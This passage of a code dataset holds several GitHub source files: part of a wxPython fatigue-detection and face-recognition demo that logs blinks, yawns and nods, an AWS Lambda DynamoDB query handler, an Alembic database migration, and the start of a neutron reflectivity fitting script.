yaw, roll = [math.radians(_) for _ in euler_angle]\r\n\r\n pitch = math.degrees(math.asin(math.sin(pitch)))\r\n roll = -math.degrees(math.asin(math.sin(roll)))\r\n yaw = math.degrees(math.asin(math.sin(yaw)))\r\n # print('pitch:{}, yaw:{}, roll:{}'.format(pitch, yaw, roll))\r\n\r\n return reprojectdst, euler_angle # 投影误差,欧拉角\r\n\r\n def eye_aspect_ratio(self, eye):\r\n # 垂直眼标志(X,Y)坐标\r\n A = dist.euclidean(eye[1], eye[5]) # 计算两个集合之间的欧式距离\r\n B = dist.euclidean(eye[2], eye[4])\r\n # 计算水平之间的欧几里得距离\r\n # 水平眼标志(X,Y)坐标\r\n C = dist.euclidean(eye[0], eye[3])\r\n # 眼睛长宽比的计算\r\n ear = (A + B) / (2.0 * C)\r\n # 返回眼睛的长宽比\r\n return ear\r\n\r\n def 
mouth_aspect_ratio(self, mouth): # 嘴部\r\n A = np.linalg.norm(mouth[2] - mouth[9]) # 51, 59\r\n B = np.linalg.norm(mouth[4] - mouth[7]) # 53, 57\r\n C = np.linalg.norm(mouth[0] - mouth[6]) # 49, 55\r\n mar = (A + B) / (2.0 * C)\r\n return mar\r\n\r\n # 处理存放所有人脸特征的 csv\r\n path_features_known_csv = \"G:/pycharm project/python project/face detecting/1111.csv\"\r\n csv_rd = pd.read_csv(path_features_known_csv, header=None)\r\n\r\n\r\n # 读取已知人脸数据\r\n # print known faces\r\n for i in range(csv_rd.shape[0]):\r\n features_someone_arr = []\r\n for j in range(0, len(csv_rd.iloc[i, :])):\r\n features_someone_arr.append(csv_rd.iloc[i, :][j])\r\n features_known_arr.append(features_someone_arr)\r\n print(\"Faces in Database:\", len(features_known_arr))\r\n\r\n def _learning_face(self, event):\r\n \"\"\"dlib的初始化调用\"\"\"\r\n # 使用人脸检测器get_frontal_face_detector\r\n self.detector = dlib.get_frontal_face_detector()\r\n # dlib的68点模型,使用作者训练好的特征预测器\r\n self.predictor = dlib.shape_predictor(\r\n \"G:/pycharm project/python project/face detecting/model/shape_predictor_68_face_landmarks.dat\")\r\n self.m_textCtrl3.AppendText(u\"Loading model successfully!!\\n\")\r\n # 分别获取左右眼面部标志的索引\r\n (lStart, lEnd) = face_utils.FACIAL_LANDMARKS_IDXS[\"left_eye\"]\r\n (rStart, rEnd) = face_utils.FACIAL_LANDMARKS_IDXS[\"right_eye\"]\r\n (mStart, mEnd) = face_utils.FACIAL_LANDMARKS_IDXS[\"mouth\"]\r\n\r\n # 建cv2摄像头对象,这里使用电脑自带摄像头,如果接了外部摄像头,则自动切换到外部摄像头\r\n self.cap = cv2.VideoCapture(self.VIDEO_STREAM)\r\n\r\n if self.cap.isOpened() == True: # 返回true/false 检查初始化是否成功\r\n self.CAMERA_STYLE = True\r\n self.m_textCtrl3.AppendText(u\"Open the camera successfully!!\\n\")\r\n time_start = time.time()\r\n else:\r\n self.m_textCtrl3.AppendText(u\"Fail to open the camera!!\\n\")\r\n # 显示封面图\r\n self.bmp.SetBitmap(wx.Bitmap(self.image_cover))\r\n # 成功打开视频,循环读取视频流\r\n while (self.cap.isOpened()):\r\n # cap.read()\r\n # 返回两个值:\r\n # 一个布尔值true/false,用来判断读取视频是否成功/是否到视频末尾\r\n # 图像对象,图像的三维矩阵\r\n flag, im_rd = self.cap.read()\r\n kk = cv2.waitKey(1)\r\n # 取灰度\r\n img_gray = cv2.cvtColor(im_rd, cv2.COLOR_RGB2GRAY)\r\n\r\n # 使用人脸检测器检测每一帧图像中的人脸。并返回人脸数faces\r\n faces = self.detector(img_gray, 0)\r\n\r\n # 待会要写的字体 font to write later\r\n font = cv2.FONT_HERSHEY_COMPLEX\r\n\r\n # 存储当前摄像头中捕获到的所有人脸的坐标/名字\r\n # the list to save the positions and names of current faces captured\r\n pos_namelist = []\r\n name_namelist = []\r\n\r\n # 计算两个128D向量间的欧式距离\r\n # compute the e-distance between two 128D features\r\n def return_euclidean_distance(feature_1, feature_2):\r\n feature_1 = np.array(feature_1)\r\n feature_2 = np.array(feature_2)\r\n dist = np.sqrt(np.sum(np.square(feature_1 - feature_2)))\r\n return dist\r\n # 如果检测到人脸\r\n if (len(faces) != 0):\r\n # enumerate方法同时返回数据对象的索引和数据,k为索引,d为faces中的对象\r\n features_cap_arr = []\r\n for k, d in enumerate(faces):\r\n # 用红色矩形框出人脸\r\n cv2.rectangle(im_rd, (d.left(), d.top()), (d.right(), d.bottom()), (0, 0, 255), 1)\r\n # 使用预测器得到68点数据的坐标\r\n shape = self.predictor(im_rd, d)\r\n features_cap_arr.append(facerec.compute_face_descriptor(im_rd, shape))\r\n # 圆圈显示每个特征点\r\n for i in range(68):\r\n cv2.circle(im_rd, (shape.part(i).x, shape.part(i).y), 2, (0, 255, 0), -1, 8)\r\n for k in range(len(faces)):\r\n print(\"##### camera person\", k + 1, \"#####\")\r\n # 让人名跟随在矩形框的下方\r\n # 确定人名的位置坐标\r\n # 先默认所有人不认识,是 unknown\r\n # set the default names of faces with \"unknown\"\r\n name_namelist.append(\"unknown\")\r\n\r\n # 每个捕获人脸的名字坐标 the positions of faces captured\r\n pos_namelist.append(\r\n tuple([faces[k].left(), int(faces[k].bottom() 
+ (faces[k].bottom() - faces[k].top()) / 4)]))\r\n\r\n # 对于某张人脸,遍历所有存储的人脸特征\r\n # for every faces detected, compare the faces in the database\r\n e_distance_list = []\r\n for i in range(len(features_known_arr)):\r\n # 如果 person_X 数据不为空\r\n if str(features_known_arr[i][0]) != '0.0':\r\n print(\"with person\", str(i + 1), \"the e distance: \", end='')\r\n e_distance_tmp = return_euclidean_distance(features_cap_arr[k], features_known_arr[i])\r\n print(e_distance_tmp)\r\n e_distance_list.append(e_distance_tmp)\r\n else:\r\n # 空数据 person_X\r\n e_distance_list.append(999999999)\r\n # 找出最接近的一个人脸数据是第几个\r\n # Find the one with minimum e distance\r\n similar_person_num = e_distance_list.index(min(e_distance_list))\r\n print(\"Minimum e distance with person\", int(similar_person_num) + 1)\r\n\r\n # 计算人脸识别特征与数据集特征的欧氏距离\r\n # 距离小于0.4则标出为可识别人物\r\n if min(e_distance_list) < 0.4:\r\n # 这里可以修改摄像头中标出的人名\r\n # Here you can modify the names shown on the camera\r\n # 1、遍历文件夹目���\r\n folder_name = 'G:/pycharm project/python project/face detecting/pictures/people'\r\n # 最接近的人脸\r\n sum = similar_person_num + 1\r\n key_id = 1 # 从第一个人脸数据文件夹进行对比\r\n # 获取文件夹中的文件名:1wang、2zhou、3...\r\n file_names = os.listdir(folder_name)\r\n for name in file_names:\r\n # print(name+'->'+str(key_id))\r\n if sum == key_id:\r\n # winsound.Beep(300,500)# 响铃:300频率,500持续时间\r\n name_namelist[k] = name[1:] # 人名删去第一个数字(用于视频输出标识)\r\n key_id += 1\r\n # 播放欢迎光临音效\r\n # playsound('D:/myworkspace/JupyterNotebook/People/music/welcome.wav')\r\n # print(\"May be person \"+str(int(similar_person_num)+1))\r\n # -----------筛选出人脸并保存到visitor文件夹------------\r\n for i, d in enumerate(faces):\r\n x1 = d.top() if d.top() > 0 else 0\r\n y1 = d.bottom() if d.bottom() > 0 else 0\r\n x2 = d.left() if d.left() > 0 else 0\r\n y2 = d.right() if d.right() > 0 else 0\r\n face = im_rd[x1:y1, x2:y2]\r\n size = 64\r\n face = cv2.resize(face, (size, size))\r\n # 要存储visitor人脸图像文件的路径\r\n # path_visitors_save_dir = \"D:/myworkspace/JupyterNotebook/People/visitor/known\"\r\n path_visitors_save_dir = \"G:/pycharm project/python project/face detecting/pictures/people/visitors/known\"\r\n # 存储格式:2019-06-24-14-33-40wang.jpg\r\n now_time = time.strftime(\"%Y-%m-%d-%H-%M-%S\", time.localtime())\r\n save_name = str(now_time) + str(name_namelist[k]) + '.jpg'\r\n # print(save_name)\r\n # 本次图片保存的完整url\r\n save_path = path_visitors_save_dir + '/' + save_name\r\n # 遍历visitor文件夹所有文件名\r\n visitor_names = os.listdir(path_visitors_save_dir)\r\n visitor_name = ''\r\n for name in visitor_names:\r\n # 名字切片到分钟数:2019-06-26-11-33-00wangyu.jpg\r\n visitor_name = (name[0:16] + '-00' + name[19:])\r\n # print(visitor_name)\r\n visitor_save = (save_name[0:16] + '-00' + save_name[19:])\r\n # print(visitor_save)\r\n # 一分钟之内重复的人名不保存\r\n if visitor_save != visitor_name:\r\n cv2.imwrite(save_path, face)\r\n print(\r\n '新存储:' + path_visitors_save_dir + '/' + str(now_time) + str(\r\n name_namelist[k]) + '.jpg')\r\n else:\r\n print('重复,未保存!')\r\n\r\n else:\r\n # 播放无法识别音效\r\n # playsound('D:/myworkspace/JupyterNotebook/People/music/sorry.wav')\r\n print(\"Unknown person\")\r\n # -----保存图片-------\r\n # -----------筛选出人脸并保存到visitor文件夹------------\r\n for i, d in enumerate(faces):\r\n x1 = d.top() if d.top() > 0 else 0\r\n y1 = d.bottom() if d.bottom() > 0 else 0\r\n x2 = d.left() if d.left() > 0 else 0\r\n y2 = d.right() if d.right() > 0 else 0\r\n face = im_rd[x1:y1, x2:y2]\r\n size = 64\r\n face = cv2.resize(face, (size, size))\r\n # 要存储visitor-》unknown人脸图像文件的路径\r\n path_visitors_save_dir = \"G:/pycharm 
project/python project/face detecting/pictures/people/visitors/unknown\"\r\n # 存储格式:2019-06-24-14-33-40unknown.jpg\r\n now_time = time.strftime(\"%Y-%m-%d-%H-%M-%S\", time.localtime())\r\n # print(save_name)\r\n # 本次图片保存的完整url\r\n save_path = path_visitors_save_dir + '/' + str(now_time) + 'unknown.jpg'\r\n cv2.imwrite(save_path, face)\r\n print('新存储:' + path_visitors_save_dir + '/' + str(now_time) + 'unknown.jpg')\r\n # 在人脸框下面写人脸名字\r\n # write names under rectangle\r\n for i in range(len(faces)):\r\n cv2.putText(im_rd, name_namelist[i], pos_namelist[i], font, 0.8, (0, 255, 255), 1,cv2.LINE_AA)\r\n\r\n print(\"Faces in camera now:\", name_namelist, \"\\n\")\r\n # 将脸部特征信息转换为数组array的格式\r\n shape = face_utils.shape_to_np(shape)\r\n \"\"\"\r\n 打哈欠\r\n \"\"\"\r\n if self.yawn_checkBox1.GetValue() == True:\r\n # 嘴巴坐标\r\n mouth = shape[mStart:mEnd]\r\n # 打哈欠\r\n mar = self.mouth_aspect_ratio(mouth)\r\n # 使用cv2.convexHull获得凸包位置,使用drawContours画出轮廓位置进行画图操作\r\n mouthHull = cv2.convexHull(mouth)\r\n cv2.drawContours(im_rd, [mouthHull], -1, (0, 255, 0), 1)\r\n # 同理,判断是否打哈欠\r\n if mar > self.MAR_THRESH: # 张嘴阈值0.5\r\n self.mCOUNTER += 1\r\n else:\r\n # 如果连续3次都小于阈值,则表示打了一次哈欠\r\n if self.mCOUNTER >= self.MOUTH_AR_CONSEC_FRAMES: # 阈值:3\r\n self.mTOTAL += 1\r\n # 显示\r\n cv2.putText(im_rd, \"Yawning!\", (10, 60), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)\r\n self.m_textCtrl3.AppendText(\r\n time.strftime('%Y-%m-%d %H:%M ', time.localtime()) + u\"yawn!!!\\n\")\r\n # 重置嘴帧计数器\r\n self.mCOUNTER = 0\r\n cv2.putText(im_rd, \"COUNTER: {}\".format(self.mCOUNTER), (150, 60), cv2.FONT_HERSHEY_SIMPLEX,\r\n 0.7, (0, 0, 255), 2)\r\n cv2.putText(im_rd, \"MAR: {:.2f}\".format(mar), (300, 60), cv2.FONT_HERSHEY_SIMPLEX, 0.7,\r\n (0, 0, 255), 2)\r\n cv2.putText(im_rd, \"Yawning: {}\".format(self.mTOTAL), (450, 60), cv2.FONT_HERSHEY_SIMPLEX, 0.7,\r\n (255, 255, 0), 2)\r\n else:\r\n pass\r\n \"\"\"\r\n 眨眼\r\n \"\"\"\r\n if self.blink_checkBox2.GetValue() == True:\r\n # 提取左眼和右眼坐标\r\n leftEye = shape[lStart:lEnd]\r\n rightEye = shape[rStart:rEnd]\r\n # 构造函数计算左右眼的EAR值,使用平均值作为最终的EAR\r\n leftEAR = self.eye_aspect_ratio(leftEye)\r\n rightEAR = self.eye_aspect_ratio(rightEye)\r\n ear = (leftEAR + rightEAR) / 2.0\r\n leftEyeHull = cv2.convexHull(leftEye)\r\n rightEyeHull = cv2.convexHull(rightEye)\r\n # 使用cv2.convexHull获得凸包位置,使用drawContours画出轮廓位置进行画图操作\r\n cv2.drawContours(im_rd, [leftEyeHull], -1, (0, 255, 0), 1)\r\n cv2.drawContours(im_rd, [rightEyeHull], -1, (0, 255, 0), 1)\r\n # 循环,满足条件的,眨眼次数+1\r\n if ear < self.EYE_AR_THRESH: # 眼睛长宽比:0.2\r\n self.COUNTER += 1\r\n\r\n else:\r\n # 如果连续3次都小于阈值,则表示进行了一次眨眼活动\r\n if self.COUNTER >= self.EYE_AR_CONSEC_FRAMES: # 阈值:3\r\n self.TOTAL += 1\r\n self.m_textCtrl3.AppendText(\r\n time.strftime('%Y-%m-%d %H:%M ', time.localtime()) + u\"blink!!!\\n\")\r\n # 重置眼帧计数器\r\n self.COUNTER = 0\r\n # 第十四步:进行画图操作,同时使用cv2.putText将眨眼次数进行显示\r\n cv2.putText(im_rd, \"Faces: {}\".format(len(faces)), (10, 30), cv2.FONT_HERSHEY_SIMPLEX, 0.7,\r\n (0, 0, 255), 2)\r\n cv2.putText(im_rd, \"COUNTER: {}\".format(self.COUNTER), (150, 30), cv2.FONT_HERSHEY_SIMPLEX, 0.7,\r\n (0, 0, 255), 2)\r\n cv2.putText(im_rd, \"EAR: {:.2f}\".format(ear), (300, 30), cv2.FONT_HERSHEY_SIMPLEX, 0.7,\r\n (0, 0, 255), 2)\r\n cv2.putText(im_rd, \"Blinks: {}\".format(self.TOTAL), (450, 30), cv2.FONT_HERSHEY_SIMPLEX, 0.7,\r\n (255, 255, 0), 2)\r\n else:\r\n pass\r\n \"\"\"\r\n 瞌睡点头\r\n \"\"\"\r\n if self.nod_checkBox7.GetValue() == True:\r\n # 获取头部姿态\r\n reprojectdst, euler_angle = self.get_head_pose(shape)\r\n har = euler_angle[0, 0] # 
取pitch旋转角度\r\n if har > self.HAR_THRESH: # 点头阈值0.3\r\n self.hCOUNTER += 1\r\n else:\r\n # 如果连续3次都小于阈值,则表示瞌睡点头一次\r\n if self.hCOUNTER >= self.NOD_AR_CONSEC_FRAMES: # 阈值:3\r\n self.hTOTAL += 1\r\n self.m_textCtrl3.AppendText(\r\n time.strftime('%Y-%m-%d %H:%M ', time.localtime()) + u\"sleepy nod!!! \\n\")\r\n # 重置点头帧计数器\r\n self.hCOUNTER = 0\r\n # 绘制正方体12轴(视频流尺寸过大时,reprojectdst会超出int范围,建议压缩检测视频尺寸)\r\n # for start, end in self.line_pairs:\r\n # im_rd = im_rd.astype(int)\r\n # print(reprojectdst)[start]\r\n # cv2.line(im_rd, reprojectdst[start], reprojectdst[end], (0, 0, 255))\r\n # 显示角度结果\r\n cv2.putText(im_rd, \"X: \" + \"{:7.2f}\".format(euler_angle[0, 0]), (10, 90),\r\n cv2.FONT_HERSHEY_SIMPLEX, 0.75, (0, 255, 0), thickness=2) # GREEN\r\n cv2.putText(im_rd, \"Y: \" + \"{:7.2f}\".format(euler_angle[1, 0]), (150, 90),\r\n cv2.FONT_HERSHEY_SIMPLEX, 0.75, (255, 0, 0), thickness=2) # BLUE\r\n cv2.putText(im_rd, \"Z: \" + \"{:7.2f}\".format(euler_angle[2, 0]), (300, 90),\r\n cv2.FONT_HERSHEY_SIMPLEX, 0.75, (0, 0, 255), thickness=2) # RED\r\n cv2.putText(im_rd, \"Nod: {}\".format(self.hTOTAL), (450, 90), cv2.FONT_HERSHEY_SIMPLEX, 0.7,\r\n (255, 255, 0), 2)\r\n else:\r\n pass\r\n\r\n print('Real-time mouth aspect ratio:{:.2f} '.format(mar) + \"\\tYawn or not:\" + str([False, True][mar > self.MAR_THRESH]))\r\n print('Real-time eye aspect ratio:{:.2f} '.format(ear) + \"\\tBlink or not:\" + str([False, True][self.COUNTER >= 1]))\r\n else:\r\n # 没有检测到人脸\r\n self.oCOUNTER += 1\r\n cv2.putText(im_rd, \"No Face\", (20, 50), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 3, cv2.LINE_AA)\r\n if self.oCOUNTER >= self.OUT_AR_CONSEC_FRAMES_check:\r\n self.m_textCtrl3.AppendText(time.strftime('%Y-%m-%d %H:%M ', time.localtime()) + u\"absence!!!\\n\")\r\n self.oCOUNTER = 0\r\n\r\n # 确定疲劳提示:眨眼50次,打哈欠15次,瞌睡点头30次\r\n time_end = time.time()\r\n timecost = time_end - time_start\r\n print(timecost)\r\n if ((self.TOTAL >= 50 or self.mTOTAL >= 15 or self.hTOTAL >= 30) and (timecost < 200)) or (timecost>14400):\r\n cv2.putText(im_rd, \"SLEEP!!!\", (100, 200), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 255), 3)\r\n\r\n # self.m_textCtrl3.AppendText(u\"疲劳\")\r\n\r\n # opencv中imread的图片内部是BGR排序,wxPython的StaticBitmap需要的图片是RGB排序,不转换会出现颜色变换\r\n height, width = im_rd.shape[:2]\r\n image1 = cv2.cvtColor(im_rd, cv2.COLOR_BGR2RGB)\r\n pic = wx.Bitmap.FromBuffer(width, height, image1)\r\n # 显示图片在panel上:\r\n self.bmp.SetBitmap(pic)\r\n\r\n # 释放摄像头\r\n self.cap.release()\r\n\r\n def update(self,event):\r\n people = os.listdir(path_images_from_camera)\r\n people.sort()\r\n\r\n # with open(\"D:/myworkspace/JupyterNotebook/People/feature/features2_all.csv\", \"w\", newline=\"\") as csvfile:\r\n with open(\"G:/pycharm project/python project/face detecting/1111.csv\", \"w\", newline=\"\") as csvfile:\r\n writer = csv.writer(csvfile)\r\n for person in people:\r\n print(\"##### \" + person + \" #####\")\r\n # Get the mean/average features of face/personX, it will be a list with a length of 128D\r\n features_mean_personX = return_features_mean_personX(path_images_from_camera + person)\r\n writer.writerow(features_mean_personX)\r\n print(\"特征均值 / The mean of features:\", list(features_mean_personX))\r\n print('\\n')\r\n # print(\"所有录入人脸数据存入 / Save all the features of faces registered into: D:/myworkspace/JupyterNotebook/People/feature/features_all2.csv\")\r\n print(\r\n \"所有录入人脸数据存入 / Save all the features of faces registered into: G:/pycharm project/python project/face detecting/1111.csv\")\r\n\r\n # import _thread\r\n # # 创建子线程,按钮调用这个方法,\r\n # 
_thread.start_new_thread(self._learning_face, (event,))\r\n def upload(self,event):\r\n\r\n dlg = wx.MessageDialog(None, u'Is this your first time using it?', u'Operating hints',wx.YES_NO | wx.ICON_QUESTION)\r\n if (dlg.ShowModal() == wx.ID_YES):\r\n # dlg = wx.TextEntryDialog()\r\n # dlg.Destroy()\r\n # dlg = wx.TextEntryDialog(None,u'Please create a folder named \"number\"+\"letter\", for instance:\"1czx')\r\n folder_name = input('Please create a folder named \"number\"+\"letter\", for instance:\"1czx\\n')\r\n path = r'G:\\pycharm project\\python project\\face detecting\\pictures\\people' + '/' +folder_name\r\n if not os.path.exists(path):\r\n os.makedirs(path)\r\n print('create folder successfully')\r\n else:\r\n print('fail to create the folder,it is exist')\r\n dlg.Destroy() # 取消弹窗\r\n else:\r\n dialog = wx.FileDialog(self, u\"choose photos\", os.getcwd(), '', wildcard=\"(*.jpg)|*.jpg\",\r\n style=wx.FD_OPEN | wx.FD_CHANGE_DIR)\r\n if dialog.ShowModal() == wx.ID_OK:\r\n path = str(dialog.GetPath()) # 更新全局变量路径\r\n filepath = os.path.basename(path)\r\n # print(path,filepath)\r\n folder_name = input('Please choose your folder named \"number\"+\"letter\", for instance:\"1czx\\n')\r\n path1 = r'G:\\pycharm project\\python project\\face detecting\\pictures\\people' + '/' + folder_name + '/' + filepath\r\n if not os.path.exists(path1):\r\n shutil.copyfile(dialog.GetPath(), path1)\r\n print('upload photo successfully')\r\n else:\r\n print('fail to create the folder,it is exist')\r\n\r\n\r\n #os.makedirs(path)\r\n # 选择文件夹对话框窗口\r\n # dialog = wx.FileDialog(self, u\"choose videos\", os.getcwd(), '', wildcard=\"(*.mp4)|*.mp4\",\r\n # style=wx.FD_OPEN | wx.FD_CHANGE_DIR)\r\n # if dialog.ShowModal() == wx.ID_OK:\r\n # # 如果确定了选择的文件夹,将文件夹路径写到m_textCtrl3控件\r\n # # self.m_textCtrl3.SetValue(u\"文件路径:\" + dialog.GetPath() + \"\\n\")\r\n # # self.VIDEO_STREAM = str(dialog.GetPath()) # 更新全局变量路径\r\n\r\n # dialog.Destroy\r\n \"\"\"使用多线程,子线程运行后台的程序,主线程更新前台的UI,这样不会互相影响\"\"\"\r\n # import _thread\r\n # # 创建子线程,按钮调用这个方法,\r\n # _thread.start_new_thread(self._learning_face, (event,))\r\n\r\n\r\n def camera_on(self, event):\r\n \"\"\"使用多线程,子线程运行后台的程序,主线程更新前台的UI,这样不会互相影响\"\"\"\r\n import _thread\r\n # 创建子线程,按钮调用这个方法,\r\n _thread.start_new_thread(self._learning_face, (event,))\r\n\r\n def cameraid_choice(self, event):\r\n # 摄像头编号\r\n cameraid = int(event.GetString()[-1]) # 截取最后一个字符\r\n if cameraid == 0:\r\n self.m_textCtrl3.AppendText(u\"Prepare to open the local camera!!!\\n\")\r\n if cameraid == 1 or cameraid == 2:\r\n self.m_textCtrl3.AppendText(u\"Prepart to open the external camera!!!\\n\")\r\n self.VIDEO_STREAM = cameraid\r\n\r\n def vedio_on(self, event):\r\n if self.CAMERA_STYLE == True: # 释放摄像头资源\r\n # 弹出关闭摄像头提示窗口\r\n dlg = wx.MessageDialog(None, u'Are you sure you want to close it?', u'Operating hints', wx.YES_NO | wx.ICON_QUESTION)\r\n if (dlg.ShowModal() == wx.ID_YES):\r\n self.cap.release() # 释放摄像头\r\n self.bmp.SetBitmap(wx.Bitmap(self.image_cover)) # 封面\r\n dlg.Destroy() # 取消弹窗\r\n # 选择文件夹对话框窗口\r\n dialog = wx.FileDialog(self, u\"choose videos\", os.getcwd(), '', wildcard=\"(*.mp4)|*.mp4\",\r\n style=wx.FD_OPEN | wx.FD_CHANGE_DIR)\r\n if dialog.ShowModal() == wx.ID_OK:\r\n # 如果确定了选择的文件夹,将文件夹路径写到m_textCtrl3控件\r\n self.m_textCtrl3.SetValue(u\"文件路径:\" + dialog.GetPath() + \"\\n\")\r\n self.VIDEO_STREAM = str(dialog.GetPath()) # 更新全局变量路径\r\n dialog.Destroy\r\n \"\"\"使用多线程,子线程运行后台的程序,主线程更新前台的UI,这样不会互相影响\"\"\"\r\n import _thread\r\n # 创建子线程,按钮调用这个方法,\r\n _thread.start_new_thread(self._learning_face, 
(event,))\r\n\r\n    def AR_CONSEC_FRAMES(self, event):\r\n        self.m_textCtrl3.AppendText(u\"Fatigue interval set to:\\t\" + event.GetString() + \" s\\n\")\r\n        self.AR_CONSEC_FRAMES_check = int(event.GetString())\r\n\r\n    def OUT_AR_CONSEC_FRAMES(self, event):\r\n        self.m_textCtrl3.AppendText(u\"Absence interval set to:\\t\" + event.GetString() + \" s\\n\")\r\n        self.OUT_AR_CONSEC_FRAMES_check = int(event.GetString())\r\n\r\n    def off(self, event):\r\n        \"\"\"Release the camera and show the cover image.\"\"\"\r\n        self.cap.release()\r\n        self.bmp.SetBitmap(wx.Bitmap(self.image_cover))\r\n\r\n    def OnClose(self, evt):\r\n        \"\"\"Handler for the window-close event.\"\"\"\r\n        dlg = wx.MessageDialog(None, u'Are you sure you want to close it?', u'Operating hints', wx.YES_NO | wx.ICON_QUESTION)\r\n        if (dlg.ShowModal() == wx.ID_YES):\r\n            self.Destroy()\r\n            print(\"detecting finish\")\r\n\r\n\r\nclass main_app(wx.App):\r\n    \"\"\"\r\n    Create the Frame inside OnInit() so it is guaranteed to be constructed\r\n    after the wx.App itself; wxPython runs OnInit once the App has finished\r\n    its own __init__.\r\n    \"\"\"\r\n\r\n    # OnInit is invoked by wxPython before the main event loop starts (specific to wxPython)\r\n    def OnInit(self):\r\n        self.frame = Fatigue_detecting(parent=None, title=\"Fatigue Demo\")\r\n        self.frame.Show(True)\r\n        return True\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    app = main_app()\r\n    app.MainLoop()\r\n\r\n","repo_name":"shalowdream/fatigue-detecting","sub_path":"final.py","file_name":"final.py","file_ext":"py","file_size_in_byte":48577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"38911002508","text":"import json\nimport boto3\nimport os\nfrom boto3.dynamodb.conditions import Attr\n\ndynamodb = boto3.resource('dynamodb')\nENVIRONMENT = os.environ['ENVIRONMENT']\n\n\ndef getEvents(event, context):\n    global dynamodb\n    response_value = {\n        'statusCode': 500,\n        'body': json.dumps({\"error\": \"Internal Error\"}),\n        'headers': {\n            'Content-Type': 'application/json',\n            'Access-Control-Allow-Origin': '*'\n        }\n    }\n    try:\n        print(event[\"queryStringParameters\"])\n        table = dynamodb.Table('Events_' + ENVIRONMENT)\n        params = event[\"queryStringParameters\"]\n        # default to a full scan when no EventType filter is supplied,\n        # so `data` is always bound before the response is built\n        if params is not None and 'EventType' in params:\n            data = table.scan(\n                FilterExpression=Attr(\"EventType\").eq(params[\"EventType\"]))\n        else:\n            data = table.scan()\n\n        response_value = {\n            'statusCode': 200,\n            'body': json.dumps(data['Items']),\n            'headers': {\n                'Content-Type': 'application/json',\n                'Access-Control-Allow-Origin': '*'\n            }\n        }\n    except Exception as e:\n        print(e)\n\n    return response_value\n","repo_name":"TheRealSeat/Capstone","sub_path":"server/lambdas/events/get/getEvents.py","file_name":"getEvents.py","file_ext":"py","file_size_in_byte":1196,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"}
{"seq_id":"95886992","text":"\"\"\"empty message\n\nRevision ID: ee440e418780\nRevises: \nCreate Date: 2022-09-06 21:03:17.069513\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'ee440e418780'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n    # ### commands auto generated by Alembic - please adjust! 
###\n op.create_table('user',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('first_name', sa.String(length=20), nullable=True),\n sa.Column('last_name', sa.String(length=20), nullable=True),\n sa.Column('email', sa.String(length=120), nullable=True),\n sa.Column('password', sa.String(), nullable=True),\n sa.Column('created_on', sa.DateTime(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_user_email'), 'user', ['email'], unique=True)\n op.create_index(op.f('ix_user_first_name'), 'user', ['first_name'], unique=False)\n op.create_index(op.f('ix_user_last_name'), 'user', ['last_name'], unique=False)\n op.create_table('toolbox',\n sa.Column('toolbox_id', sa.Integer(), nullable=False),\n sa.Column('userid', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['userid'], ['user.id'], ),\n sa.PrimaryKeyConstraint('toolbox_id')\n )\n op.create_table('tool',\n sa.Column('tool_id', sa.Integer(), nullable=False),\n sa.Column('toolboxid', sa.Integer(), nullable=True),\n sa.Column('tool_name', sa.String(length=20), nullable=True),\n sa.Column('tool_brand', sa.String(length=20), nullable=True),\n sa.Column('quantity', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['toolboxid'], ['toolbox.toolbox_id'], ),\n sa.PrimaryKeyConstraint('tool_id')\n )\n op.create_index(op.f('ix_tool_tool_brand'), 'tool', ['tool_brand'], unique=False)\n op.create_index(op.f('ix_tool_tool_name'), 'tool', ['tool_name'], unique=False)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index(op.f('ix_tool_tool_name'), table_name='tool')\n op.drop_index(op.f('ix_tool_tool_brand'), table_name='tool')\n op.drop_table('tool')\n op.drop_table('toolbox')\n op.drop_index(op.f('ix_user_last_name'), table_name='user')\n op.drop_index(op.f('ix_user_first_name'), table_name='user')\n op.drop_index(op.f('ix_user_email'), table_name='user')\n op.drop_table('user')\n # ### end Alembic commands ###\n","repo_name":"ag4sm/Toolbox","sub_path":"migrations/versions/ee440e418780_.py","file_name":"ee440e418780_.py","file_ext":"py","file_size_in_byte":2444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"33509536380","text":"# Example of neutron reflectivity dataset refinement from a\n# thick SiO2 layer at the air/Si interface\n# Measurments acquired at D17 instrument (ILL, Grenoble)\nfrom anaklasis import ref\n\nproject='SiO_fit'\nin_file=['D17_SiO.dat']\nunits=['A']\n\nfit_mode=0 # 0 is for linear, 1 is for log\nfit_weight=[1]\nmethod = 'mcmc' # Markov Chain Monte Carlo Sampling\n\nresolution=[-1] # pointwise resolution\n\nmodel = [\n\t# Re_sld Im_sld thk rough solv description\n\t[ 0.0, 0.0, 0, 'p0', 0.0, 'Air'],\n\t[ 'p1', 0.0, 'p2', 'p3', 0.0, 'SiOx'],\n\t[ 2.07e-6, 0.0, 0, 0.0, 0.0, 'Si'],\n\t]\n\nsystem=[model]\npatches=[1.0]\n\nglobal_param = [\n # param min max description type\n ['p0', 0, 20, 'air/SiOx_roughness','uniform'],\n ['p1', 3.3e-6, 3.7e-6, 'SiOx_sld','uniform'],\n ['p2', 0, 2000, 'SiOx_thickness','uniform'],\n ['p3', 0, 30, 'SiOx/Si_roughness','uniform'],\n\t]\n\nmulti_param = []\nconstraints = []\n\nbackground = [\n\t[0.0e-11,1.0e-5,'uniform'],\n\t]\n\nscale = [\n\t[0.8,1.1,'uniform'],\n\t]\n\nres = ref.fit(project, in_file, units, fit_mode, fit_weight,method,resolution,patches, system,\nglobal_param,multi_param, constraints, background,scale,experror=True, 
